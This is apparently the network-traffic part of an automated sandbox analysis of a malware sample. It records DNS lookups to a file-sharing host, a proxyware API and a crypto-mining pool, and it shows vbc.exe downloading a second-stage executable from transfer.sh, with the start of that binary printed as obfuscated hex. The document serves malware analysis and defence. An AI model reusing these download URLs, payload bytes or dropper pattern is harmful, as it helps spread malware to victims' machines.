Nov 26, 2022 11:17:52.814788103 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.814829111 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.815009117 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.815009117 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.815063000 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.815241098 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.832880974 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.832922935 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.833043098 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.833044052 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.833093882 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.833159924 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.850914001 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.850982904 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.851067066 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.851114035 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.851140976 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.851169109 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.866173983 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.866214037 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.866309881 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.866309881 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.866345882 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.866394997 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.880387068 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.880425930 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.880530119 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.880584002 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.880614996 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.880644083 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.898828030 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.898865938 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.898993015 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.899041891 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.899106979 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.913476944 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.913520098 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.913702011 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.913748026 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.913827896 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.925625086 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.925673008 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.925878048 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.925924063 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.926022053 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.946566105 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.946602106 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.946719885 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.946770906 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.946801901 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.946839094 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.956614971 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.956671953 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.956736088 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.956763983 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.956794024 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.956823111 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.972146988 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.972260952 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.972260952 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.972317934 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.972353935 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.972383022 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.981884003 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.981930017 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.982021093 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.982052088 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.982088089 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.982242107 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.997349024 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.997450113 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.997582912 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.997584105 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:52.997622967 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:52.997693062 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.009337902 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.009401083 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.009493113 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.009536028 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.009567022 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.009593964 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.023394108 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.023449898 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.023593903 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.023595095 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.023633003 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.023689032 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.039602041 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.039685965 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.039808035 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.039808989 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.039846897 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.039918900 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.049433947 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.049485922 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.049567938 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.049604893 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:53.049633026 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:53.049654007 CET	49709	443	192.168.2.5	144.76.136.153

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 26, 2022 11:17:39.679454088 CET	192.168.2.5	8.8.8.8	0xfb5f	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Nov 26, 2022 11:17:39.851632118 CET	192.168.2.5	8.8.8.8	0xe6b4	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Nov 26, 2022 11:17:48.650311947 CET	192.168.2.5	8.8.8.8	0x392d	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)	false
Nov 26, 2022 11:18:09.244813919 CET	192.168.2.5	8.8.8.8	0x7038	Standard query (0)	api.peer2profit.com	A (IP address)	IN (0x0001)	false
Nov 26, 2022 11:19:26.272330046 CET	192.168.2.5	8.8.8.8	0xd3f1	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 26, 2022 11:17:39.841095924 CET	8.8.8.8	192.168.2.5	0xfb5f	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2022 11:17:39.841095924 CET	8.8.8.8	192.168.2.5	0xfb5f	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Nov 26, 2022 11:17:39.870127916 CET	8.8.8.8	192.168.2.5	0xe6b4	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2022 11:17:39.870127916 CET	8.8.8.8	192.168.2.5	0xe6b4	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Nov 26, 2022 11:17:48.670322895 CET	8.8.8.8	192.168.2.5	0x392d	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)	false
Nov 26, 2022 11:18:09.265117884 CET	8.8.8.8	192.168.2.5	0x7038	No error (0)	api.peer2profit.com		172.66.43.60	A (IP address)	IN (0x0001)	false
Nov 26, 2022 11:18:09.265117884 CET	8.8.8.8	192.168.2.5	0x7038	No error (0)	api.peer2profit.com		172.66.40.196	A (IP address)	IN (0x0001)	false
Nov 26, 2022 11:19:26.291959047 CET	8.8.8.8	192.168.2.5	0xd3f1	No error (0)	pool.hashvault.pro		95.179.241.203	A (IP address)	IN (0x0001)	false
Nov 26, 2022 11:19:26.291959047 CET	8.8.8.8	192.168.2.5	0xd3f1	No error (0)	pool.hashvault.pro		45.76.89.70	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

transfer.sh

api.peer2profit.com

www.idpminic.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49708	144.76.136.153	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Direction	Data
2022-11-26 10:17:49 UTC	OUT	GET /get/frWBuE/123%20%282%29.exe HTTP/1.1 Host: transfer.sh Connection: Keep-Alive
2022-11-26 10:17:49 UTC	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sat, 26 Nov 2022 10:17:49 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 10 Connection: close Retry-After: Sat, 26 Nov 2022 11:17:51 GMT X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 127.0.0.1,102.129.143.49,102.129.143.49 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1669457871 X-Served-By: Proudly served by DutchCoders Strict-Transport-Security: max-age=63072000
2022-11-26 10:17:49 UTC	IN	Data Raw: 4e 6f 74 20 46 6f 75 6e 64 0a Data Ascii: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49709	144.76.136.153	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:17:49 UTC	0	OUT	GET /get/A4YbIY/1607293575.exe HTTP/1.1 Host: transfer.sh
2022-11-26 10:17:50 UTC	0	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 26 Nov 2022 10:17:50 GMT Content-Type: application/x-ms-dos-executable Content-Length: 2525912 Connection: close Cache-Control: no-store Content-Disposition: attachment; filename="1607293575.exe" Retry-After: Sat, 26 Nov 2022 11:17:51 GMT X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 127.0.0.1,102.129.143.49,102.129.143.49 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 8 X-Ratelimit-Reset: 1669457871 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Strict-Transport-Security: max-age=63072000
2022-11-26 10:17:50 UTC	1	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 2e 03 0b 01 02 24 00 96 23 00 00 70 26 00 00 12 00 00 b0 14 00 00 00 10 00 00 00 b0 23 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 e0 26 00 00 04 00 00 99 e1 26 00 02 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL.$#p&#@&&@
2022-11-26 10:17:50 UTC	16	IN	Data Raw: 54 6b 64 ec 56 56 4f 5a 6f 08 be 81 00 e1 d9 8b 45 c4 eb 05 79 59 04 a8 af e8 6d e3 ff ff 8b 45 e4 89 5c 24 08 8d 4d dc 51 b9 f9 55 00 00 b9 3e 22 00 00 b9 59 07 00 00 b9 0d 04 00 00 59 c7 44 24 0c 00 00 00 00 8b 55 d8 89 44 24 04 eb 05 61 0f 61 6e de 8b 45 e0 eb 0f df 93 a8 81 10 8e e3 e9 0c 3c 92 0e bd 3f e3 89 04 24 8b 45 c4 e8 18 e3 ff ff eb 0f 71 e6 1b 86 5b f1 db ed bf 64 f5 c9 05 70 10 eb 0f c7 aa e8 7d 41 ca ca 61 1a 5e 8a 14 b1 f6 ef 8d 45 e4 8b 55 d4 51 b9 79 3e 00 00 59 89 f1 89 44 24 08 8b 45 e0 c7 44 24 0c 01 00 00 00 89 44 24 04 8b 45 dc 89 04 24 8b 45 c4 e8 c6 e2 ff ff 8d 45 e0 8b 55 e4 89 d9 89 44 24 08 8b 45 dc 52 ba ab 16 00 00 ba 32 19 00 00 5a c7 44 24 0c 02 00 00 00 89 44 24 04 eb 19 6b 39 dd b9 56 7d 72 e1 43 d3 7c 8a 62 00 14 fe 14 Data Ascii: TkdVVOZoEyYmE\$MQU>"YYD$UD$aanE<?$Eq[dp}Aa^EUQy>YD$ED$D$E$EEUD$ER2ZD$D$k9V}rC\|b
2022-11-26 10:17:50 UTC	32	IN	Data Raw: 01 23 45 67 c7 45 b4 89 ab cd ef c7 45 b8 fe dc ba 98 c7 45 bc 76 54 32 10 c7 45 c0 f0 e1 d2 c3 52 ba 3e 0b 00 00 ba 26 48 00 00 ba ef 57 00 00 ba bc 67 00 00 5a c7 85 d8 fe ff ff 0d 00 00 00 e8 1c fc ff ff 50 51 b9 4a 43 00 00 b9 3d 68 00 00 b9 28 66 00 00 b9 c0 07 00 00 59 8b 85 c8 fe ff ff 8b 95 cc fe ff ff c7 45 e0 00 00 00 00 c7 45 e4 00 00 00 00 89 44 24 04 8d 85 68 ff ff ff 89 54 24 08 52 51 b9 53 12 00 00 b9 d4 6e 00 00 b9 b2 32 00 00 b9 e6 71 00 00 59 ba d1 7e 00 00 ba 70 3b 00 00 ba 57 4f 00 00 ba 6b 63 00 00 5a 89 04 24 eb 0f 7c 64 7d 53 0e 70 0d 4e e2 76 2f dc 17 2a 1f eb 0f 76 57 f1 fd 2e 83 77 92 5d d4 a1 ce 1a 86 e7 c7 85 d8 fe ff ff 03 00 00 00 e8 63 aa 21 00 c7 04 24 70 03 64 00 eb 05 cd ee 0c 6c e7 8d 8d 68 ff ff ff eb 05 c5 f5 13 09 a5 Data Ascii: #EgEEEvT2ER>&HWgZPQJC=h(fYEED$hT$RQSn2qY~p;WOkcZ$\|d}SpNv/*vW.w]c!$pdlh
2022-11-26 10:17:50 UTC	48	IN	Data Raw: 8e 8a db 91 ab 68 14 26 c1 51 b9 65 47 00 00 b9 68 6a 00 00 b9 d6 3a 00 00 b9 29 40 00 00 59 c7 85 f8 fd ff ff 15 00 00 00 89 54 24 08 eb 19 e5 72 10 21 f8 76 30 20 b0 f5 63 c2 8e 73 cf dc b2 d2 53 05 9f 98 3f c7 a9 90 eb 0f 0e fb 80 39 ea 56 ac 04 a5 5d 56 55 fd b6 19 8d 95 20 ff ff ff 89 54 24 04 89 04 24 e8 02 b2 ff ff 8d 8d 20 ff ff ff e8 f0 c2 1f 00 8d 8d 38 ff ff ff e8 e5 c2 1f 00 c7 04 24 83 0f 64 00 eb 0f 37 5c 93 f5 4a 62 df 20 d6 0f 7f e6 5d e7 d0 50 b8 1c 17 00 00 58 8d 8d 48 fe ff ff c7 85 f8 fd ff ff 16 00 00 00 e8 ab bb ff ff 50 8d 8d 38 ff ff ff c7 04 24 35 0e 64 00 e8 12 a7 ff ff 50 8d 8d 50 ff ff ff c7 04 24 3f 0e 64 00 e8 ff a6 ff ff 50 8d 8d 68 ff ff ff c7 04 24 4a 0e 64 00 e8 ec a6 ff ff 51 8d 4d 80 c7 04 24 58 0e 64 00 e8 dc a6 ff ff Data Ascii: h&QeGhj:)@YT$r!v0 csS?9V]VU T$$ 8$d7\Jb ]PXHP8$5dPP$?dPh$JdQM$Xd
2022-11-26 10:17:50 UTC	64	IN	Data Raw: 24 e8 d1 ee 1b 00 83 ec 0c 8d 4d e0 e8 56 83 1f 00 8b 85 64 ff ff ff c7 44 24 08 80 fb 5c 00 c7 44 24 04 f0 53 65 00 eb 05 ef 64 0b fd 1e 51 b9 05 67 00 00 b9 36 55 00 00 b9 5f 7f 00 00 b9 3f 3e 00 00 59 89 04 24 c7 85 78 ff ff ff 02 00 00 00 e8 41 3f 22 00 8b 45 c8 89 85 6c ff ff ff 8b 45 cc 89 85 70 ff ff ff 8b 85 6c ff ff ff 03 85 70 ff ff ff 90 83 bd 6c ff ff ff 00 89 85 68 ff ff ff 8d 45 e8 89 45 e0 75 28 83 bd 68 ff ff ff 00 74 1f 50 58 50 b8 7f 29 00 00 58 c7 04 24 12 02 64 00 c7 85 78 ff ff ff 02 00 00 00 e8 d5 61 22 00 83 bd 70 ff ff ff 0f 0f 86 90 00 00 00 83 bd 70 ff ff ff 00 79 16 c7 04 24 80 01 64 00 c7 85 78 ff ff ff 02 00 00 00 e8 71 63 22 00 8b 85 70 ff ff ff 40 79 10 90 c7 85 78 ff ff ff 02 00 00 00 e8 00 61 22 00 eb 05 fd 13 23 d8 f1 eb Data Ascii: $MVdD$\D$SedQg6U_?>Y$xA?"ElEplplhEEu(htPXP)X$dxa"ppy$dxqc"p@yxa"#
2022-11-26 10:17:50 UTC	80	IN	Data Raw: 1c 00 75 7b 8b 00 c7 04 24 9a 28 64 00 8d 4d c8 c7 45 98 ff ff ff ff 89 45 88 e8 fe fd ff ff 8d 4d c8 c7 45 98 01 00 00 00 50 8b 45 90 83 c0 04 89 04 24 e8 1f 59 1f 00 51 8d 4d e0 89 04 24 e8 d7 86 1f 00 8b 4d 88 c7 45 98 02 00 00 00 50 8b 45 e0 89 04 24 e8 b9 ea ff ff 50 8d 4d e0 e8 04 43 1f 00 8d 4d c8 e8 fc 42 1f 00 8b 45 90 c6 40 1c 01 8d 45 94 89 04 24 e8 da 79 13 00 c9 c3 c7 04 24 10 00 00 00 e8 1c f1 21 00 c7 44 24 04 ff ff ff ff c7 04 24 6f 28 64 00 89 c1 89 45 8c c7 45 98 03 00 00 00 e8 24 fb ff ff 52 8b 45 8c 52 c7 45 98 ff ff ff ff c7 44 24 08 d8 9c 56 00 c7 44 24 04 84 53 65 00 89 04 24 e8 c8 fe 21 00 8b 45 9c 89 45 90 8b 45 98 85 c0 74 12 48 75 0a 8d 4d e0 e8 80 42 1f 00 eb 05 48 74 0c 0f 0b 8d 4d c8 e8 71 42 1f 00 eb 0b 8b 45 8c 89 04 24 e8 Data Ascii: u{$(dMEEMEPE$YQM$MEPE$PMCMBE@E$y$!D$$o(dEE$RERED$VD$Se$!EEEtHuMBHtMqBE$
2022-11-26 10:17:50 UTC	96	IN	Data Raw: 00 58 5a eb 0f 9a 90 3d bf c1 7d d1 67 c7 22 10 39 51 40 02 52 ba 1f 6a 00 00 5a eb 05 dd 82 1c eb 7f 90 50 b8 40 75 00 00 eb 05 55 ce 8d 21 60 eb 05 11 af e4 49 52 b8 6d 64 00 00 50 58 eb 19 8e 66 db 68 26 5e 4b bf 9b 99 f3 e7 66 a9 ba a0 92 f5 ed 41 de ed 8f 0f 9c eb 05 3b 29 0f 6f 8b 52 ba 26 23 00 00 5a 58 51 b9 11 24 00 00 59 eb 0f 1e 34 1f 72 d9 31 ba 9f 69 9b 4a c9 a6 c1 ac 52 ba 34 26 00 00 5a 50 eb 0f ee eb fa 1b b2 4a e3 8e de 44 19 5b 97 ee 0d b8 11 5a 00 00 b8 87 0e 00 00 b8 f8 69 00 00 52 ba 5f 7f 00 00 ba c0 07 00 00 5a 51 b9 dd 56 00 00 b9 58 07 00 00 b9 8f 40 00 00 b9 d3 3a 00 00 59 b8 5e 2f 00 00 58 eb 0f 0b b7 06 e2 68 7c 6b a1 c0 79 b3 c7 76 78 ea eb 0f 59 df f2 5e 9c 85 77 51 05 74 e6 00 3a d3 08 50 eb 0f bd 5b 33 3f e7 82 57 91 18 f0 Data Ascii: XZ=}g"9Q@RjZP@uU!`IRmdPXfh&^KfA;)oR&#ZXQ$Y4r1iJR4&ZPJD[ZiR_ZQVX@:Y^/Xh\|kyvxY^wQt:P[3?W
2022-11-26 10:17:50 UTC	112	IN	Data Raw: d5 8a 61 9d fb 51 51 b9 c4 30 00 00 b9 fe 51 00 00 59 b9 a9 5c 00 00 b9 d8 5e 00 00 b9 7c 7c 00 00 b9 ee 7c 00 00 59 90 50 b8 f1 64 00 00 58 5a 52 ba 99 0b 00 00 ba 4e 3a 00 00 ba 86 4f 00 00 ba 02 50 00 00 5a 51 59 eb 0f 51 25 8a 2a 05 da c8 df 91 2c 32 e4 82 ca b3 50 b8 e8 6a 00 00 58 51 b9 47 17 00 00 b9 a0 46 00 00 b9 3c 63 00 00 b9 4d 2c 00 00 59 eb 19 cd b2 3e ef 6b 49 78 a6 11 28 f2 77 69 a4 35 af 19 bd 02 60 69 f2 28 38 98 52 ba 73 18 00 00 5a 90 eb 05 6a d6 2a 57 f2 90 90 52 5a eb 0f 98 39 e4 e9 dd bb a7 39 de 49 af 55 08 94 79 ba 9e 54 00 00 50 b8 5e 11 00 00 b8 64 0f 00 00 52 5a b8 ef 42 00 00 eb 05 85 7c a0 9c 99 b8 9d 08 00 00 eb 19 2d 3a 1d 48 97 89 84 b3 06 87 fb ee bc 92 4a b4 9e 0c 86 14 a4 d4 8c 80 d3 eb 19 c5 c1 36 a3 c8 86 da b7 23 0e Data Ascii: aQQ0QY\^\|\|\|YPdXZRN:OPZQYQ%,2PjXQGF<cM,Y>kIx(wi5`i(8RsZjWRZ99IUyTP^dRZB\|-:HJ6#
2022-11-26 10:17:50 UTC	128	IN	Data Raw: 02 0d 33 a8 a1 eb 19 8d 5d ca ab 8e 1d cd 7a 52 e8 7d cf 1a 46 d3 c4 85 ac 36 62 bf 7f 20 8d 06 eb 0f 9e 88 af 71 4c b6 4e e1 7e 7b 6f 43 c9 3e f1 50 b8 da 0c 00 00 58 50 b8 d5 39 00 00 58 52 ba bd 43 00 00 5a 51 50 b8 74 03 00 00 58 eb 0f 95 2e bf e7 a6 68 92 16 2d bb d7 cd c7 7a 8c eb 19 bb 8f 10 9f bc 9d d9 80 44 6c 7c 01 a7 be 5b 9e 72 3f 34 b5 fa f3 1a 58 24 90 59 51 52 eb 05 0d f4 f6 7f 75 eb 05 a9 bb ef a7 5c 5a eb 0f 16 2b d4 2c c0 8c 59 fd bc 46 09 c7 75 13 a8 50 58 eb 0f a8 2d 4b 6f e1 45 22 84 78 0f f1 3e 4a d5 19 52 ba 33 58 00 00 ba 7d 5c 00 00 ba e7 72 00 00 ba ff 1d 00 00 5a 51 b9 bf 50 00 00 eb 0f b0 a2 16 55 d2 d1 7f a9 1d 36 c4 43 45 20 d3 eb 0f bb ad 38 92 0d 7a d9 5a 6c 36 2e 5d b0 1e 8f 52 ba 07 67 00 00 ba 5d 45 00 00 ba f8 1c 00 00 Data Ascii: 3]zR}F6b qLN~{oC>PXP9XRCZQPtX.h-zDl\|[r?4X$YQRu\Z+,YFuPX-KoE"x>JR3X}\rZQPU6CE 8zZl6.]Rg]E
2022-11-26 10:17:50 UTC	144	IN	Data Raw: 6b af 41 8f 25 cd b3 10 ea 73 a9 9d bb 5f 53 90 51 b9 3e 50 00 00 59 51 b9 e2 23 00 00 b9 3a 18 00 00 59 eb 05 14 06 82 90 8e 52 ba 39 2e 00 00 ba 0d 66 00 00 5a 51 b9 cf 4f 00 00 b9 b9 6f 00 00 59 52 ba 98 5e 00 00 5a eb 0f 9c 50 41 e9 02 af aa 45 31 2c 38 7c 3b 52 b7 eb 19 cd 9d fe f9 5a 13 33 e5 7e e5 a8 6b 90 ba 43 7f 76 ce 78 16 9e 50 35 0f 47 50 b8 86 5e 00 00 b8 11 1b 00 00 b8 81 6e 00 00 b8 1b 5b 00 00 58 eb 19 34 6a 45 4e 63 de 70 97 fc c2 dd a6 76 24 92 33 73 34 e5 2a ae 2a fe c2 c2 51 b9 c5 5a 00 00 51 59 59 51 eb 0f 22 81 b0 d3 bf e6 f2 db e8 f4 dd 3e b3 a5 13 b9 59 40 00 00 eb 05 b2 0a 33 36 ba b9 57 6b 00 00 59 eb 05 ac 88 f1 53 64 50 b8 23 75 00 00 58 eb 0f 01 ba 90 18 73 7a 60 95 0d 18 c3 b8 63 f7 21 52 ba 99 1d 00 00 ba 85 2d 00 00 5a 51 Data Ascii: kA%s_SQ>PYQ#:YR9.fZQOoYR^ZPAE1,8\|;RZ3~kCvxP5GP^n[X4jENcpv$3s4**QZQYYQ">Y@36WkYSdP#uXsz`c!R-ZQ
2022-11-26 10:17:50 UTC	160	IN	Data Raw: af f4 f2 0d 30 3d 4d 92 d3 0e 09 b8 de ce c4 21 46 4f cf 88 80 d8 ab ac 04 90 eb 05 4f e9 f0 f4 bf 52 ba b7 3b 00 00 ba 51 2d 00 00 5a 90 51 b9 f1 1e 00 00 59 90 eb 0f b9 37 fc a4 6b f7 b9 db 37 31 ac 9d d3 82 22 eb 0f ac 6f c7 2a 0a 70 64 ad 86 f3 ef 5e 45 c5 51 50 51 50 eb 19 cd a1 9d cd 8e a8 2d 15 3a b8 d7 df a2 5f 3f 3d 4c 84 c8 bf 00 28 3e 99 55 b8 c3 35 00 00 b8 80 09 00 00 b8 0a 07 00 00 b8 ff 38 00 00 58 eb 05 82 0b b7 42 7f eb 05 8e 5a 64 d8 5b 51 b9 f9 61 00 00 59 b9 91 7c 00 00 b9 19 1d 00 00 51 59 b9 ef 42 00 00 b9 9a 18 00 00 59 eb 0f c7 db 7a 3e 94 af 29 ca 2d 60 6f db 31 ce fb 58 50 51 b9 27 54 00 00 eb 0f 19 a8 13 62 8f 0f 6c 8f 8f 82 25 9f cd 8a f1 52 ba a5 4b 00 00 ba cf 13 00 00 ba c6 50 00 00 ba 8c 77 00 00 5a 59 52 5a eb 05 7b b2 9b Data Ascii: 0=M!FOOR;Q-ZQY7k71"o*pd^EQPQP-:_?=L(>U58XBZd[QaY\|QYBYz>)-`o1XPQ'Tbl%RKPwZYRZ{
